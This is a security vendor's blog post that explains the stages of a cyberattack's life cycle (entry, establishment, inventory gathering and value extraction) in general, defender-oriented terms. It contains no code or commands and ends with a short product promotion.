Cmd.com will be migrated to Elastic.co shortly.
By: Thaddeus Walsh
In the last blog, we discussed a handful of asymmetries that, together, explain the seemingly endless depth of cost and effort required to properly secure technology assets. In this piece, we’ll cover the life cycle of a cyberattack. This life cycle is universally consistent across cyberattacks, so we’ll be leaning on that consistency to upend the three asymmetries.
Life cycle: A series of stages through which something (such as an individual, culture, or manufactured product) passes during its lifetime.
It’s worth noting that most cyberattacks exist in more than one stage concurrently at some point in their lifecycle, and only the first and final stages are inherently chronological.
Let’s begin with the end, what is the objective of any cyberattack? The final objective of any cyberattack can be framed as Value Extraction. Whether the attack is stealing intellectual property, using Denial of Service, encryption to ransom processes or files, cryptomining on the victim’s resources, or simply bragging rights to their friends, every attacker is trying to extract some value they couldn’t obtain otherwise.
Continuing to work backwards, a cyberattack must discover one or more assets to be leveraged in order to perform value extraction. In many cases, the attacker doesn’t know what value they’ll reap or how they will extract that value when they begin their attack. They must first Gather an Inventory of the environment that they’ve successfully penetrated. This inventory could include files, databases, software build processes, customer data, network topography, access to other networks, or nearly any knowledge of the victim or other potential victims.
Once that inventory has been gathered, typically the attacker will devise a way to leverage the available inventory to perform their value extraction. But, as we see with spray and pray ransomware, there’s not necessarily a direct decision being made by the attacker on what assets to leverage or what value extraction methodology the attack will use. In most attacks, the inventory is continuously gathered at every stage, and is either directed (e.g. the attacker intends to compromise and ransom database servers) or undirected (e.g. long dwelling APTs).
Most cyberattacks don’t proceed directly from initial compromise to inventory/value extraction. Prior to completing the Inventory stage, most modern attacks will go through a broad stage that we refer to as Establishment. This includes actions that increase the attack’s resiliency, persistence, privilege escalation, and expansion.
When cyberattacks were first emerging they were simple, targeted common software, but were prone to failure and deteriorated in value over time as the environments they were built to autonomously compromise drifted further from the original target profile. Modern cyberattacks almost universally rely on C2 or command and control systems to remotely drive the attack. This dynamic capability increases both the likelihood of the attack’s success and the potential value that can be extracted from the victim. To make these more complex attacks durable against discovery and defenses, modern attacks will generally compromise additional assets to create redundant backdoors. This allows re-entry even if the victim discovers the attack in progress and intercedes. In order to create those points of redundancy and gather the most comprehensive inventory, the attack will typically attempt to achieve some form of escalated privileges, ideally achieving effective root access on as many hosts as possible.
Finally taking one last step backwards we arrive at the attacker’s initial Entry into the victim’s environment. This could be anything from an insider intentionally running a malicious payload to a well-meaning employee opening a malicious email attachment. There have been attacks that gain entry via API calls to unprotected endpoints, code injection on web app fields that lack data sanitization or validation, browser attacks via malicious ads, and in 2021 specifically, software supply chain attacks where a software vendor’s environment has been compromised and the malicious payload is delivered to their customer’s systems.
Now running the life cycle forward, the attacker has to obtain Entry into the victim’s environment. Next the attacker will Establish itself by expanding, escalating privileges, and creating ways to resume the attack if discovered. All along the way, the attacker has been capturing data to Gather an Inventory of assets and information that will enable them to Extract Value. Historically, security has naturally put an extreme emphasis on stopping attacks at Entry and that’s created a paradigm of perpetual reactivity.
Check back in for my next blog where I talk about how to use your knowledge of the universal cyberattack lifecycle to upend the Attacker-Defender asymmetry.
Ramp up your Linux defense strategies
and see what you've been missing.